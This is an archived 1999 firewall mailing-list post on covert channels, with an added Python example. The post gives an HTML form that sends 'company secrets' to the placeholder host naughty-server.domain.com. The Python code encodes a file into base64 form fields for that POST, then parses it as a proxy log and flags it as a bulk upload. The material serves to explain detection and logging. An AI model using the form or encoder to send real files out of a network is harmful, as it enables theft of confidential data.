Firewall Wizards mailing list archives

RE: Covert Channels (was dns outbound)


From: "Mayne, Peter" <Peter.Mayne () compaq com>
Date: Mon, 31 May 1999 14:43:14 +0800

Why bother with low-bandwidth DNS traffic? Write yourself a .htm file
containing the following:

<form action="http://naughty-server.domain.com/accept.cgi" method="post">
<input type="text" name="i1" value="Here are the company secrets.">
<input type="text" name="i2" value="Widget V2 will be released on
1-Jul-1999.">
<input type="submit" name="submit" value="Send Secrets">
</form>

(It's obviously a trivial exercise to write a Perl script that takes a Word
document and MIME encodes it appropriately.)

Load the file into your favourite browser, hit the submit button, and let
accept.cgi write the form data somewhere convenient. How many proxies will
log the contents of the form? Shouldn't this data be logged somewhere?

(Of course, if you don't log the contents of your outgoing mail, why bother
logging this stuff? Not to mention those pocket-sized DATs.)

HTTP has always been a quick and easy way of sending data. It doesn't help
that everyone on the planet (and probably some off it) is using HTTP as a
transport for whatever they happen to be interested in (RealPlayer,
Microsoft's DCOM, SETI@Home 8-).

Stopping covert channels on a system is frightfully difficult. How do you
stop someone from doing Morse code using CPU usage, for instance? (Three
short do-nothing loops, three long do-nothing loops, three short do-nothing
loops.)

PJDM
----
Peter Mayne, Compaq Computer Australia, Canberra, ACT
These are my opinions, and have nothing to do with Compaq.
"The wise man knows that he knows nothing." - Bill. "That's us, dude!" -
Ted.
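Added example, not part of Peter's message: the form above is rendered the way a browser would POST it, the "Perl script" job of turning a file into base64 form fields is done in a few lines, and then the request is parsed the way a proxy would have to parse it to answer the question the message raises (what should be logged). naughty-server.domain.com and accept.cgi are the placeholders from the post; the "Word document" is a constructed byte string and nothing is sent over the network. The upload heuristic and the field naming (i1, i2, ...) are assumptions made here.

```python
"""Added example (not code from the original post): build the form POST the
message describes, then show what a proxy must keep to have logged it.
Hosts, paths and the sample 'document' are constructed; nothing leaves the box."""
import base64
import hashlib
import re
from urllib.parse import parse_qsl, urlencode

CHUNK = 57  # 57 raw bytes -> 76 base64 chars, one MIME line per field (assumption)


def fields_from_file(data: bytes, chunk: int = CHUNK) -> dict:
    """The 'trivial Perl script': split a file into base64 fields i1..iN
    plus the submit button, ready to drop into the form."""
    fields = {}
    for n, off in enumerate(range(0, len(data), chunk), start=1):
        fields[f"i{n}"] = base64.b64encode(data[off:off + chunk]).decode("ascii")
    fields["submit"] = "Send Secrets"
    return fields


def build_post(host: str, path: str, fields: dict) -> bytes:
    """Render the submission as a browser sends it: HTTP/1.0 POST with an
    application/x-www-form-urlencoded body."""
    body = urlencode(fields).encode("ascii")
    head = (
        f"POST {path} HTTP/1.0\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
    ).encode("ascii")
    return head + body


def proxy_log_record(raw: bytes) -> dict:
    """What the proxy would need to record to answer 'what left the network?':
    request line, body size and hash, and the decoded form fields."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("ascii", "replace").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    record = {
        "method": method,
        "host": headers.get("host", ""),
        "path": path,
        "content_type": headers.get("content-type", ""),
        "declared_length": int(headers.get("content-length", "0")),
        "actual_length": len(body),
        "body_sha256": hashlib.sha256(body).hexdigest(),
        "fields": {},
    }
    if record["content_type"].startswith("application/x-www-form-urlencoded"):
        pairs = parse_qsl(body.decode("ascii", "replace"), keep_blank_values=True)
        record["fields"] = dict(pairs)
    return record


B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def looks_like_file_upload(record: dict, min_bytes: int = 1024) -> bool:
    """Heuristic (assumption, not from the post): a 'form' whose fields are
    mostly base64 blobs totalling more than a typed form would carry."""
    blobs = [v for v in record["fields"].values() if len(v) >= 40 and B64_RE.match(v)]
    return sum(len(v) for v in blobs) >= min_bytes


def reassemble(record: dict) -> bytes:
    """Inverse of fields_from_file: recover the file from the logged fields,
    which is what an investigator wants after the fact."""
    names = [k for k in record["fields"] if re.fullmatch(r"i\d+", k)]
    names.sort(key=lambda k: int(k[1:]))
    return b"".join(base64.b64decode(record["fields"][k]) for k in names)


if __name__ == "__main__":
    secret = b"Widget V2 will be released on 1-Jul-1999.\n" * 40  # constructed 'Word document'
    raw = build_post("naughty-server.domain.com", "/accept.cgi", fields_from_file(secret))
    rec = proxy_log_record(raw)
    print(rec["method"], rec["host"], rec["path"], rec["actual_length"], "bytes,",
          len(rec["fields"]), "fields, sha256", rec["body_sha256"][:16])
    print("bulk upload?", looks_like_file_upload(rec))
    assert reassemble(rec) == secret
```

The record is the minimum a proxy could write per POST without keeping whole bodies (hash plus sizes); keeping the decoded fields as well is what makes reassemble() possible later, which is the trade-off the message is pointing at.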


